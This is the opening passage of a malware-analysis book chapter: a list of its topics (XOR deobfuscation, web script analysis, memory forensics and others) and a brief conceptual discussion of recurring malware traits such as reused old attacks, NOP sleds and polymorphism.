In this chapter, we will cover the following topics:
Linux configuration for network traffic analysis
Xor DeObfuscation
Malicious web script analysis
Bytecode decompilers
Document analysis
Redline-Malware memory forensics
Malware intelligence
The battle never ends, and fighting malware is like trying to kill a multi-headed Hydra. The tools are dual-natured and both offense and defence keep progressing, and the methods keep getting innovated. Also, few features keep recurring:
Regression: Repeating an old attack to the uninitiated or unprepared is like catching the enemy unawares, and hence is an effective technique.
Redundancy: As in the case of using NOP sleds in shellcode is like buying insurance and ensures that the probability of success is increased manifold.
Mutation: Polymorphism is the most effective and widespread technique as of now. If you can't see it, you can't find it. Even being diverse and distributed is a form of mutation, as the threat landscape...